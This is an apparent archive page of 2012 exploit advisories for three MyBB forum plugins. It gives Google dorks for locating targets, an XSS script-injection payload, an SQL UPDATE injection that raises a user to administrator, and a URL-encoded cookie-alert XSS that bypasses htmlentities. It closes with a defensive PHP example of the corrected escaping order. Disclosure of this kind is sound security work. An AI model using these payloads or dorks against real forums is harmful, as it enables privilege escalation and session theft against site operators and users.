Archive for 19 December 2012

Social Sites MyBB Plugin 0.2.2 Cross Site Scripting

A Cross Site Scripting vulnerability has been found in version 0.2.2 of the Social Sites MyBB Plugin; the discoverer's notes on the vulnerability are below:

# Exploit Title: Social Sites MyBB Plugin 0.2.2 Cross Site Scripting
# Google Dork: inurl:usercp.php?action=socialsites
# Date: 13.12.2012
# Exploit Author: s3m00t
# Vendor Homepage: http://mattrogowski.co.uk/mybb/
# Software Link: http://mods.mybb.com/view/social-sites
# Version: 0.2.2
# Tested on: PHP

Reason:
Lack of input validation at several places.

Proof of Concept:
1. Navigate to "usercp.php?action=socialsites" and you will see a number of
fields, as in http://i.imgur.com/0tz98.png.
2. Submit the input below into any of the fields:
" /><script>alert(1)</script><img src="
3. The input will be stored as shown at http://i.imgur.com/Z8bYM.png

Solution:
Replace the content of "inc/plugins/socialsites.php" with this script:
http://pastebin.com/5JLdg4gh

MyYoutube MyBB plugin SQL UPDATE injection

A SQL UPDATE injection vulnerability has been found in the MyYoutube MyBB plugin; how the vulnerability arises and the relevant source code are below. The discoverer's description of the vulnerability is as follows:

# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.
# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"
# Date: 12.10.2012
# Exploit Author: Zixem
# Vendor Homepage: http://www.mybb-es.com
# Software Link: http://mods.mybb.com/view/myyoutube
# Version: 1.0
# Tested on: Linux.

MyYoutube plugin suffers from POST SQL UPDATE injection.

The vulnerability exists within youtube.php:

<?php

$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/

function youtube_update($ytb) /*Line 128*/
{
    global $mybb;
    if(isset($mybb->input['ytb']))
    {
        // Raw request input is copied straight into the data the user
        // datahandler writes with an UPDATE; it is never passed through
        // $db->escape_string(), so a quote in it changes the query.
        $ytb->user_update_data['ytb'] = $mybb->input['ytb'];
    }
}

?>

Instructions:

(1) Go to usercp.php?action=profile

(2) http://i.imgur.com/gPYdq.png
Enter this in the youtube ID field (just like in the picture): x', usergroup='4

(3) Press on the update button.

(4) You're an admin now :3

If you're still not an admin, just play with the number... on my pentest forum, the admins' usergroup number is 4.

PoC:
before: http://i.imgur.com/aPFsz.png
While exploiting: http://i.imgur.com/gPYdq.png
Result: http://i.imgur.com/4ezpF.png

http://twitter.com/z1xem

-Zixem

MyBB AJAX Chat Persistent XSS Vulnerability


A persistent XSS vulnerability has been found in MyBB AJAX Chat; the discoverer's notes on how the vulnerability arises and how it is used are as follows.


# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filtered with the htmlentities function below.

<?php
$db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));
?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

<?php
$msg = urldecode($row["message"]);
?>

The vulnerability can be exploited via the following line, decoded as - "><img alt="" src="XSS" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc, alert is just a basic example.

Brought to you by Mr. P-teo.

Twitter: http://twitter.com/MrPteo
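The encoding-order bug the advisory above describes, as an added example that is not part of the advisory or of the AJAX Chat plugin: the storage and display steps are reduced to plain functions, with the vulnerable order (escape, then decode) beside the hardened order (decode, then escape once at output). The function names and the sample message are constructed for this example.

```php
<?php
// Added example, not the AJAX Chat plugin's code: the encoding-order bug
// behind the advisory, shown as a storage path and a display path.

// Vulnerable storage (as the plugin does it): HTML-escape, then save.
// A percent-encoded '<' (%3C) contains no '<' yet, so htmlentities() leaves it alone.
function store_vulnerable(string $raw): string {
    return htmlentities($raw, ENT_QUOTES, 'UTF-8');
}

// Vulnerable display (as the plugin does it): urldecode() runs AFTER the
// escaping step, so '%3C' becomes a live '<' in the page.
function display_vulnerable(string $stored): string {
    return urldecode($stored);
}

// Hardened storage: do any decoding first and keep the plain text. SQL
// escaping stays with the DB layer (MyBB's $db->escape_string), not here.
function store_fixed(string $raw): string {
    return urldecode($raw);
}

// Hardened display: escape exactly once, at the last step before output,
// so no later transformation can undo it.
function display_fixed(string $stored): string {
    return htmlentities($stored, ENT_QUOTES, 'UTF-8');
}

// True if the rendered string still carries an unescaped tag start.
function reaches_browser_as_markup(string $rendered): bool {
    return preg_match('/<[a-z]/i', $rendered) === 1;
}

// Constructed sample: a percent-encoded tag, the bypass the advisory describes.
$raw = '%3Cimg%20src%3Dx%3E';

$vuln  = display_vulnerable(store_vulnerable($raw));
$fixed = display_fixed(store_fixed($raw));

printf("vulnerable path renders markup: %s\n", var_export(reaches_browser_as_markup($vuln), true));
printf("hardened path renders markup:   %s\n", var_export(reaches_browser_as_markup($fixed), true));
```

The same check applies when reviewing any plugin that stores escaped text: every decode, unserialize or strip step that runs after the escape is a candidate for reopening the hole.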